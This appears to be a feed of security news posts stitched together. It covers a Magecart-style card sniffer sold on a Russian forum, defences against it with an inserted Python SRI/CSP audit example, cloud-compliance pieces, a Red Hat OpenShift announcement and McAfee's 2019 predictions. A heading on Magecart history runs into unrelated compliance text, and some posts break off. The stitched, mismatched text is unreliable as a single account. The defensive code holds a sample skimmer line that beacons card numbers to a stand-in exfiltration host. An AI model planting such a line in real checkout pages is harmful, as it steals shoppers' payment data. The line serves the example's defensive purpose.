Cloud security firm Avanan announced on Monday that it has raised $25 million in a Series B funding round, which brings the total raised by the company to date to over $41 million.
Armor, a cloud security solutions provider, has found what it believes to be the first Magecart-style (payment card sniffing) attack tool to be openly offered for sale on the Dark Web. Previous Magecart-style attacks, such as those against British Airways and Newegg, were carried out by specific threat groups that, by all accounts, used their own proprietary payment card sniffing tools rather than a sniffer sold openly on underground hacker markets.
According to the ad, posted in the first week of December, this Magecart-style attack tool is new and is being sold for $1,300 USD. The ad is on a Russian-language forum, and the threat actor selling the tool has been active on Russian forums for over a year. He has purportedly also developed and offered for sale a banking trojan for the Android mobile operating system.
The sniffer collects payment card data as it is entered and sends it to a remote server under the buyer's control. The tool also sends the stolen data over SSL/TLS, so the exfiltration does not appear as plaintext card numbers in network traffic and is harder for security teams to spot leaving the e-commerce site.
Less than a month ago, on November 30th, Armor's Threat Resistance Unit (TRU) released a Threat Alert stating that it expected an increase in Magecart-style attacks coinciding with the holiday e-commerce rush, as a natural next step in the evolution of Magecart attacks following the attention and reporting brought on by successful compromises over the last several months, including Ticketmaster, British Airways, Newegg and multiple third-party plugin providers. The TRU team predicted that, as part of this next phase, there would be an increase in low-sophistication Magecart copycat attacks, similar to what was seen in the cryptominer and ransomware outbreaks of the last couple of years.
In the opinion of TRU senior security researcher Corey Milligan, “This attack tool represents the first step in the commoditization of the Magecart-style attack, creating a new line of revenue for the original Magecart threat groups while simultaneously serving to saturate the threat landscape with attempts by low-level threat actors, and thus hiding the original threat actors’ own activities that security experts are now hot on the trail of.”
Milligan also noted that, “while this tool provides low-sophistication threat actors with a powerful capability, other pieces are required to utilize the sniffer effectively, as it does not identify vulnerable e-commerce targets using Magento, OpenCart or OsCommerce payment forms. It also does not provide a mechanism for penetrating identified targets, implanting the script that will download and run the sniffer in a browser, or providing a secure, non-attributable server to collect the harvested credit card data.”
In the hands of a low-level threat actor, the TRU team believes this tool will most likely be plugged into a process of automated scanning for, and indiscriminate attacks on, vulnerable e-commerce sites, even ones that don't have the applicable payment form. “We expect to see a mass of ‘Hail Mary’ attacks, with the cybercriminals intent on hitting as many sites as possible, hoping that some of them will succeed and be fruitful,” said Milligan. “As the adage goes, they only have to be right once, and in this case, being right once could result in a haul of credit card data that is profitable and easy to sell on the Dark Web.”
How E-Commerce Retailers Can Protect Themselves and Their Customers from Magecart-Style Attacks
While these recommendations are ranked Good, Better, Best, it is recommended that, where possible, they be used in combination to provide a layered defense.
– Keep your payment page simple. Loading third-party scripts on your payment processing page increases your exposure to third-party compromise. Many third-party content providers are not focused on security. Threat actors are known to choose the softer target, and they will not hesitate to circumvent your security by compromising a third party you trust on your payment page.
– Audit public-facing web content regularly to identify unauthorized changes.
– Use subresource integrity (SRI) for embedded scripts. The integrity attribute pins a script to a hash of its expected contents, so the browser refuses to run a modified copy. On its own it won't protect you from every form of third-party code injection (a script that is legitimately updated needs a new hash, and inline code is not covered), but as a practice it raises your level of security and makes you a harder target.
– As a backup measure and a step to mitigate similar attacks, a content security policy (CSP) header can be employed. This header tells the browser accessing your site where resources may be loaded from, and directives such as connect-src and form-action also limit where the page may send data. It won't stop the download of a script from a compromised but trusted third party, but it does help mitigate other HTML injection attacks where the content source has been changed to an untrusted one.
– Outsource your payment processing to a third-party payment processor. While this involves trusting a third party, not all third parties are equal. Do your homework before selecting one, but, in general, dedicated payment processors have well-implemented security practices. While there are additional costs to using an external payment processor, it can also relieve you of many stringent PCI DSS requirements that have costs of their own.
It is worth noting that the seller of the credit card sniffer referenced above specifically stated in the offering that the tool would not be effective against sites that use third-party payment forms, because the entry of payment information and the payment processing do not actually take place on the infected e-commerce site.
If you have been affected by one of these attacks and the third-party code supplier has cleaned up its end, you may still be serving the malicious script if you use a Content Delivery Network (CDN) that caches content to improve performance. If so, be sure to purge cached pages and scripts as one of the final cleanup steps.
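The three technical controls in the list above (SRI on embedded scripts, a CSP header, and regular audits for unauthorized changes) fit together as follows. This is an added example, not code from Armor or from the original advisory; the script contents, paths and host names are constructed stand-ins for real files.

```python
# Added example; not code from Armor or the advisory above. Shows how a build
# step computes Subresource Integrity (SRI) metadata for a payment-page script,
# the check a browser performs on the fetched bytes, a Content Security Policy
# for the checkout page, and a baseline audit that flags changed or unexpected
# scripts. The script bodies, paths and hosts are constructed stand-ins.
import base64
import hashlib

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_integrity(content: bytes, algo: str = "sha384") -> str:
    """Return 'sha384-<base64 digest>' for the exact bytes that will be served."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """The <script> element a build step writes into the payment page."""
    return (f'<script src="{src}" integrity="{sri_integrity(content)}" '
            'crossorigin="anonymous"></script>')


def sri_matches(integrity: str, fetched: bytes) -> bool:
    """The browser's decision: run the bytes only if they match the integrity value."""
    algo, _, expected = integrity.partition("-")
    if algo not in SRI_ALGORITHMS:
        # Browsers ignore unknown algorithms; this check fails closed instead.
        return False
    actual = base64.b64encode(hashlib.new(algo, fetched).digest()).decode("ascii")
    return actual == expected


def payment_page_csp(script_hosts):
    """CSP for the checkout page. script-src limits where scripts load from;
    connect-src, form-action and img-src limit where the page may send data,
    which is what a card sniffer needs in order to exfiltrate."""
    directives = [
        "default-src 'self'",
        "script-src 'self' " + " ".join(script_hosts),
        "connect-src 'self'",
        "form-action 'self'",
        "img-src 'self'",
        "object-src 'none'",
        "base-uri 'self'",
    ]
    return "; ".join(directives)


def audit_scripts(baseline, served):
    """Compare scripts currently served (path -> bytes) against a baseline
    (path -> integrity value). Returns (path, issue) pairs."""
    findings = []
    for src, content in served.items():
        if src not in baseline:
            findings.append((src, "unexpected script"))
        elif not sri_matches(baseline[src], content):
            findings.append((src, "content changed"))
    return findings


# Constructed sample: the vetted checkout script and a skimmed copy that
# beacons the card number out via an image request (which img-src 'self'
# would also block in the browser).
CHECKOUT_JS = b"window.checkout=function(f){return submit(f)};"
TAMPERED_JS = (b"window.checkout=function(f){new Image().src="
               b"'https://exfil.example/c?'+f.card;return submit(f)};")
BASELINE = {"/static/checkout.js": sri_integrity(CHECKOUT_JS)}

if __name__ == "__main__":
    print(script_tag("/static/checkout.js", CHECKOUT_JS))
    print(payment_page_csp(["https://cdn.vetted.example"]))
    print(audit_scripts(BASELINE, {"/static/checkout.js": TAMPERED_JS}))
```

Regenerate the integrity values as part of every release build, not by hand, and run the audit against what the CDN actually serves rather than against your origin, since a cached copy is what shoppers receive.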
How Online Shoppers Can Protect Themselves from a Magecart Attack
While most banks offer services to help you recover from fraud, it can take time. In the case of a debit card, the time it takes to recover stolen funds that may be needed to pay a bill is too big of a risk to take. Using a credit card reduces this risk, but an even better solution is to use a prepaid card. Prepaid cards are easy to obtain, even for those with no credit history, and they limit the amount that can be stolen via fraud to the amount of money you put on the card. Prepaid cards may not be the most convenient or cost-effective solution, but they can help keep your credit and bank account information out of the hands of criminals.
History of Magecart Attacks
The growing demand for increased business agility and cost reductions in relation to IT infrastructure and applications is not a new agenda item for C-level executives. It has, however, remained a priority topic in 2018.
Compliance with various regulations and cloud security requirements has expanded as technology and cloud uptake advance — albeit not at a similar pace, leaving organizations with a challenging conundrum to solve. This is particularly relevant when executives consider cloud security and business transformations.
Balance the Costs and Benefits of Cloud Migration
The partnership between IBM and Red Hat announced earlier this year highlights a strategic vision to deliver transformational change to clients and meet cloud security demand. We’ve also seen record-breaking technological advancements and a growing number of data and application migrations to the cloud.
In general, these migrations follow either a hybrid or multicloud strategy. Hybrid cloud is defined as a combination of cloud services that are deployed both on-premises and in the cloud. Multicloud means using multiple cloud computing service providers across a single heterogeneous environment for applications, software or infrastructure.
Whatever the strategy, cloud migrations involve transitioning and managing extensive processing and workloads outside of traditional IT infrastructure while addressing cloud security and compliance challenges. The main industries that are seeing an increased focus, volume and complexity of regulations are banking and financial services. In these sectors, many are pursuing innovative business strategies that drive requirements for critical infrastructure and applications to the cloud.
The regulatory compliance challenge for such innovation poses both an opportunity and a concern for the C-suite and boardroom. Financial institutions must confront the reality of dramatically increasing costs while also keeping pace with the legislative and regulatory changes arising from numerous regulatory bodies. Global organizations have the added burden of even more international and nation-specific regulations.
The cost of compliance is often high, but any effort to reduce staff without demonstrable and measurable improvements in compliance processes and technology could be viewed negatively by regulatory bodies, investors and shareholders.
Meet Cloud Security Compliance Requirements Head-On
One of the most common misconceptions we hear from clients is that moving to the cloud, with data held by multiple third parties on shared systems, will be a complex undertaking. Our view is that cloud services can be extremely secure and often a more stable option than existing internal IT infrastructure. However, there are some activities that need to be considered to meet regulatory compliance requirements, such as:
- Deploying continuous monitoring of both technical and nontechnical cloud compliance requirements. This should also include corporate governance, cybersecurity and regulatory compliance controls;
- Maintaining a unified source or framework of governance, risk and compliance information for how cloud services are utilized;
- Developing executive and operational dashboards to provide visibility into cloud compliance statuses;
- Implementing real-time alerting mechanisms for control failures with defined playbooks on how to respond to compliance failures from third-party providers; and
- Ensuring that you can continuously synchronize new cloud services and capabilities with regulatory compliance requirements.
These cloud security to-dos can help your organization take on the seemingly daunting task of cloud migration while remaining secure and compliant.
The post Overcoming the Cloud Security Compliance Conundrum appeared first on Security Intelligence.
Last month, I spoke during the Innovation Showcase at the Financial Services Information Sharing and Analysis Center (FS-ISAC) Fall Summit. The goal was to update this group of high-level security professionals on a continuous compliance managed services solution that helps solve the cloud compliance dilemma — and on the solution’s first successful implementation. In a consortium of more than 30 financial services firms building an industry-standard cloud control framework, almost all reported regulatory compliance as a major hurdle to cloud adoption.
Overcome the Challenges of Cloud Compliance
Financial institutions are eager to use the hybrid cloud as a productive workplace to achieve strategic goals. But as reported in our white paper, “Turning Regulatory Challenges of the Cloud Into Competitive Advantage,” firms must overcome three major cloud adoption challenges.
First, companies face different regulatory obligations in various geographies. Multinational organizations must map regulatory obligations to 26 different countries and jurisdictions as far-flung as Singapore, London and New York.
Second, cloud service providers (CSPs) often provide different levels of control in the cloud than in the data center. That leaves financial services firms to build the right controls to address how they store and use data and who can access it — wherever it is. Regulators express concern over the amount of sensitive information CSPs maintain, often without being subject to the stringent regulations that govern banks, according to Business Insider.
Third, financial services firms and CSPs need a common security framework. A major accomplishment was reaching a consensus among the consortium members on the Cloud Security Alliance (CSA) open source framework. Modifications make it possible to build a single framework that is fully integrated with risk management and cybersecurity controls.
Lay the Groundwork for Continuous Compliance
Our managed services solution helps answer these challenges with continuous compliance to meet requirements for workloads running on public clouds — not only for regulations impacting the cloud, but for the General Data Protection Regulation (GDPR), Financial Industry Regulatory Authority (FINRA), U.S. Securities and Exchange Commission (SEC) and other regulatory bodies. The solution was developed in three stages.
1. Build a Regulatory Database for All Geographies
A continuous compliance database maps to every regulatory authority around the world. The database also defines GDPR and other cybersecurity obligations. The service monitors changes and makes timely updates to an industry-standard cloud control framework and regulatory database.
2. Map All of the Regulations and Controls to Each CSP
Mapping to CSPs is critical to achieve a standard level of control and to meet or exceed controls financial services firms might use within their own firewalls. Our solution maps a standard set of controls to every CSP, whether it’s Amazon, Google, Microsoft or IBM.
3. Adapt the Solution to the Individual Financial Services Firm
Each financial services firm already maintains in-house controls. The managed services solution requires an adapter to map the standardized framework to the existing framework for each firm’s individual policies, standards and procedures.
Continuous Compliance in Action
One of the largest investment firms in the world recently implemented the continuous compliance managed services solution with impressive success. A team of back-office personnel previously spent each day combing the internet for new and changing legislation and determining the impacts on current controls. The employees made updates manually.
The work was painstaking, tedious, and labor- and time-intensive, but these compliance employees formed the firm’s frontline defense against regulatory risk. Our managed services solution will help enable the firm to reduce its staff while saving substantially on compliance and reducing the risk of regulatory fines and reputational damage.
Automate Compliance With Cognitive Computing
Compliance is not a one-time event, but rather an ongoing process of monitoring and maintaining. Automation and cognitive computing — including artificial intelligence (AI) and machine learning — are the engines behind better, more efficient cloud governance.
In the future, the continuous compliance service will use Watson for RegTech. Watson will initially ingest existing regulations. Then, Watson will not only identify changes and update regulations, but also revise the controls that correspond with each regulation. Once Watson is fully trained, the time to add a new regulation or update an existing one will shrink exponentially.
Transfer to Other Obligations, Technologies and Domains
Financial services firms ultimately need to be in complete, real-time alignment with their regulatory obligations worldwide. Firms can access the industry-standard database to consume and adapt to updates for policies, requirements and controls while still maintaining their own firm-specific controls and processes. Our managed services solution mainly covers financial services regulations for cloud computing. Going forward, look for the scope to extend to regulations covering myriad technologies and domains to help financial institutions of all stripes overcome their greater cloud adoption challenges.
The post Continuous Compliance Eases Cloud Adoption for Financial Services Firms appeared first on Security Intelligence.
Zane Lackey is the co-founder and CSO at Signal Sciences, and the author of Building a Modern Security Program (O’Reilly Media). He serves on multiple Advisory Boards including the National Technology Security Coalition, the Internet Bug Bounty Program, and the US State Department-backed Open Technology Fund. Prior to co-founding Signal Sciences, Zane led a security team at the forefront of the DevOps/Cloud shift as CISO of Etsy. In this interview with Help Net Security he … More
The post CISO challenges and the path to cutting edge security appeared first on Help Net Security.
As 2018 draws to a close, it’s time to reflect on the strides the cybersecurity industry made over the past year, and how far companies around the world still have to go to improve their security posture. Throughout the year, businesses were plagued by cybersecurity risks and hit with massive data breaches. In the lead-up to the holiday season, security leaders across industries are wishing for a quiet 2019 with no negative data breach headlines.
5 Cybersecurity Missteps That Put Enterprises at Risk in 2018
What lessons did we learn in 2018? And as we look forward, what best practices can we implement to improve defenses in the new year? We asked industry experts where they observe the worst security practices that still leave enterprises exposed to cybersecurity risks, and they offered advice to help companies and users enjoy a merrier, brighter, more secure 2019.
1. Poor Password Policies
Although passwords are far from perfect as a security mechanism, they are still used pervasively in the enterprise and in personal life. Yet password policies are still rife with problems around the globe.
Idan Udi Edry, CEO of Trustifi, said the most foundational — and also most disregarded — cybersecurity practice is maintaining a strong password.
“A unique password should be utilized for every account and not reused,” said Edry. “It is important to update passwords every 30–90 days. Passwords should never include a significant word, such as a pet’s name, or a significant date, such as a birthdate.”
Deploying devices and appliances and then leaving default passwords in place is also still a shockingly common practice. A threat actor with knowledge of a manufacturer or service provider’s default password conventions can do a lot of damage to an organization with factory settings still in place.
Edry advised enterprises to employ two-factor authentication (2FA) to add more security to their access strategy. Douglas Crawford, digital privacy adviser for BestVPN, meanwhile, recommended encouraging employees to use a password manager.
“It is hard to remember strong passwords for every website and service we use, so people simply stop bothering,” said Crawford. “Use of ‘123456’ as a password is still scarily common. And then we use the same password on every website we visit. This [is] particularly irksome, as this entire security nightmare can be easily remedied through use of password manager apps or services, which do the heavy lifting for us.”
2. Misconfigured Cloud Storage
Earlier this year, researchers from Digital Shadows uncovered more than 1.5 billion sensitive files stored in publicly available locations, such as misconfigured websites and unsecured network-attached storage (NAS) drives.
“Unfortunately, many administrators misconfigure [these buckets] rendering the contents publicly-accessible,” wrote Michael Marriott, senior strategy and research analyst with Digital Shadows.
The information uncovered included a treasure trove of personal data, such as payroll, tax return and health care information — all available to prying eyes thanks to overlooked security best practices in cloud storage.
“With the rise of mobility and cloud usage in enterprises, one of the worst security practices is leaving critical cloud services and SaaS applications open to the internet,” said Amit Bareket, co-founder and CEO of Perimeter 81.
It’s time to get proactive to analyze potential exposures in storage and then devise a plan to address cloud data risks to your organization. It’s also important to remember that with any connected service, it is often better not to deploy than to deploy insecurely.
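One way to turn "analyze potential exposures in storage" into a repeatable check. This is an added example, not code from Digital Shadows or the article: it evaluates an S3 bucket policy and bucket ACL offline, in the JSON shapes the AWS API returns, and reports grants that make objects readable or listable by anyone. The bucket name, policy and ACL are constructed. The check deliberately does not model Deny statements, S3 Block Public Access settings or per-object ACLs, so a clean result here is not proof that the bucket is private.

```python
# Added example; not from Digital Shadows or the article. Flags public-read
# grants in an S3 bucket policy (GetBucketPolicy JSON) and a bucket ACL
# (GetBucketAcl response). Sample inputs are constructed. Deny statements,
# Block Public Access and object-level ACLs are out of scope here.
import json

PUBLIC_ACL_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal) -> bool:
    """'*' or {'AWS': '*'} means any identity, including anonymous callers."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def _is_read_action(action: str) -> bool:
    """Object reads, bucket listing, and wildcards that cover them."""
    a = action.lower()
    return a in ("*", "s3:*") or a.startswith("s3:get") or a.startswith("s3:list")


def public_policy_statements(policy):
    """Return Allow statements that grant a public principal a read/list action.
    Accepts the policy as a JSON string or an already-parsed dict."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_public(stmt.get("Principal")):
            continue
        actions = sorted(a.lower() for a in _as_list(stmt.get("Action", [])) if _is_read_action(a))
        if not actions:
            continue
        # A Condition (e.g. aws:SourceVpce) narrows who matches; report it as
        # conditional rather than silently treating it as safe.
        findings.append({
            "sid": stmt.get("Sid", ""),
            "actions": actions,
            "conditional": "Condition" in stmt,
        })
    return findings


def public_acl_grants(acl: dict):
    """Return ACL grants to the AllUsers / AuthenticatedUsers groups."""
    findings = []
    for grant in acl.get("Grants", []):
        group = PUBLIC_ACL_GROUPS.get(grant.get("Grantee", {}).get("URI", ""))
        if group:
            findings.append({"group": group, "permission": grant.get("Permission")})
    return findings


def bucket_is_public(policy, acl) -> bool:
    return bool(public_policy_statements(policy)) or bool(public_acl_grants(acl))


# Constructed samples: a policy that serves every object to the world, and an
# ACL that lets anyone list the bucket.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::payroll-exports/*",
    }],
}
SAMPLE_ACL = {
    "Owner": {"ID": "ownercanonicalid"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "ownercanonicalid"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
    ],
}

if __name__ == "__main__":
    print(public_policy_statements(SAMPLE_POLICY))
    print(public_acl_grants(SAMPLE_ACL))
    print("public:", bucket_is_public(SAMPLE_POLICY, SAMPLE_ACL))
```

Feed the function the raw policy document and ACL you pull for every bucket in every account, and treat a non-empty result as a finding to triage, not as a verdict: a Condition that pins access to a VPC endpoint is very different from an unconditional `Principal: *`.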
3. Ineffective Cyber Awareness Training
Security begins and ends with your employees — but how much do they know about security? Specifically, how much do they know about the risks they are facing and how their actions could set your business up for a potential incident?
“At this time of the year, it’s critically important to ensure proper employee awareness of the risks related to travel,” said Baan Alsinawi, president and founder of TalaTek, a Washington-based risk management firm. “Using public Wi-Fi at airports or hotels to access corporate data, possible loss of personally-held devices such as an iPad, iPhone or corporate laptop, especially if not encrypted, talking to strangers about work issues or projects over a glass of wine can expose confidential information.”
Of course, a robust awareness program needs to be in place year-round. Data from London-based advisory and solutions company Willis Towers Watson found that employees are the cause of 66 percent of all cyberbreaches, either through negligence or deliberate offense.
Employees should be regularly educated on phishing, social engineering techniques and other attack vectors that could put corporate data at risk. If awareness training isn’t part of your security strategy, 2019 is the time to learn what an effective awareness program looks like and implement one to promote security best practices in your organization.
4. Poor Oversight of Third-Party Cybersecurity Risks
Third-party vendors and partners can be a source of compromise if criminals can access your organization’s sensitive information through their poorly secured systems. If you’re working with third-party vendors and partners, your security is only as good as theirs. If their systems are breached, your data is also at risk.
“Attackers seeking access to hardened company systems can pivot to breaching an integrated third party, establishing a beachhead there and then leveraging the trust implicit in the integration to gain access,” explained Ralph R. Russo, director of applied computing programs and professor of practice of IT management and cybersecurity at Tulane University School of Professional Advancement.
In 2019, evaluate the state of your third-party risk management. Make it a priority to identify gaps that may put you at risk if you are working with less-than-secure vendors. Implement a vigorous vetting process to determine the security level of your trusted partners.
5. Lack of an Incident Response Plan
A formal, regularly tested cybersecurity incident response plan is essential, yet many organizations continue to operate without one. In fact, 77 percent of companies do not have any formal plan.
Without a written and tested incident response plan, you’re unprepared for the worst-case scenario. It is not enough to focus on prevention; it is essential to establish a comprehensive incident response plan that is clear, detailed, flexible, includes multiple stakeholders, and tested and updated regularly.
Improve Your Security Posture in 2019 and Beyond
If your organization engages in any of these poor practices, it may be time to brush up on your basic cyber hygiene best practices. By following the recommendations outlined here, you can confidently resolve to close gaps in risk mitigation and establish more effective strategies to improve your company’s security posture in 2019 and beyond.
The post Avoid Coal in Your Digital Stocking — Here’s How to Improve Your Security Posture in 2019 appeared first on Security Intelligence.
Google this week announced the availability of several new features for its Google Cloud Platform (GCP) customers, as part of the beta release of its Cloud Security Command Center (Cloud SCC).
By Sathish Balakrishnan
There’s no shortage of data pointing to the growth of Linux container and cloud-native applications. According to a recent survey from the Cloud Native Computing Foundation (CNCF), many of the Kubernetes deployments underpinning these workloads are taking place in public clouds. While Red Hat OpenShift Container Platform provides the industry’s most comprehensive enterprise Kubernetes platform for on-premise and hybrid cloud containerized workloads, we also enable organizations to consume OpenShift-as-a-service with Red Hat OpenShift Dedicated.
Today, we’re adding enhancements to Red Hat OpenShift Dedicated, from instance types to updated pricing and new models allowing for OpenShift Dedicated to be deployed on customer’s cloud subscriptions. This is designed to provide more flexibility to customers and help make it easier for them to deploy containerized applications on enterprise Kubernetes in the public cloud.
Red Hat OpenShift Dedicated is based on Red Hat OpenShift Container Platform and delivered as a fully managed service directly by Red Hat on Amazon Web Services (AWS) and other cloud providers. This enables customers to consume Red Hat’s powerful container and Kubernetes platform just like other cloud services to gain greater agility, flexibility and focus on building applications.
Red Hat OpenShift Dedicated on AWS now supports the ability for customers to bring their own cloud accounts. This new option allows customers to use their AWS contracts and pricing as well as their existing security profiles that have been validated by their corporate security teams, helping to further reduce friction in adopting Red Hat OpenShift Dedicated on AWS.
New features provided by Red Hat OpenShift Dedicated include:
Multi-AZ stretched clusters which allow for cluster deployment across multiple availability zones (AZ). This helps to maximize service availability for production systems and applications.
Expanded EC2 instance types including memory-optimized, compute-optimized or general purpose, which can be sized to meet specific needs.
Additional enhancements to Red Hat OpenShift Dedicated include:
Encrypted persistent volumes
Cluster console for more admin-level cluster status, node visibility, access control management and a cluster-wide event stream
Improvements to the dedicated-admin role, such as the ability to modify the default project template
Another key facet of public cloud computing is cost-effectiveness, and updates to Red Hat OpenShift Dedicated pricing on AWS help to make these decisions more straightforward for IT leaders. Starting on Dec. 12, 2018, the cost of an OpenShift Dedicated Cluster is reduced by 25 percent and the cost of additional nodes has been cut by 50 percent. This helps reduce the overhead costs of running enterprise Kubernetes in AWS while providing a flexible, supported and fully open platform for production deployments.
As with all Red Hat technologies, Red Hat OpenShift Dedicated is backed by Red Hat’s extensive expertise and award-winning support 24×7. We feel that these pricing updates combined with the enhanced features make Red Hat OpenShift Dedicated an even more effective platform for building new cloud-native workloads and bridging existing workloads to public cloud instances.
Along with Red Hat OpenShift Dedicated, we announced a Red Hat OpenShift solution jointly engineered with Microsoft at Red Hat Summit in May 2018: Red Hat OpenShift on Azure. As we approach general availability of Red Hat OpenShift on Azure in 2019, the first batch of customers have been on-boarded to a private preview of the offering. If you would like to join private preview, please let your Red Hat Account Executive know about your interest.
To learn more about the new pricing and features in Red Hat OpenShift Dedicated, please visit https://www.openshift.com/products/dedicated/ .
By Don Boxely, CEO and Co-Founder at DH2i, The decentralization of today’s enterprise is a recognized fact. The multitude of cloud benefits—cheap storage, pay-per-use pricing, disaster recovery (DR), and
The post Hybrid and Multi-Cloud Security: Bulletproof Software Defined Perimeter Implementations appeared first on The Cyber Security Place.
These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.
As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.
We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.
Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.
One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.
—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research
Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats
Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.
We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.
Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.
As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.
We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.
Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.
We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.
Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.
We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.
Artificial Intelligence the Future of Evasion Techniques
To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict that in 2019, because criminals can now easily outsource key components of their attacks, evasion techniques will become more agile through the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.
In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the Rig Exploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.
Different evasions for different malware
In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:
- Cryptocurrency mining: Miners implement a number of evasion techniques. One example is WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
- Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
- Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDoS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
- Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.
Artificial intelligence the next weapon
In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.
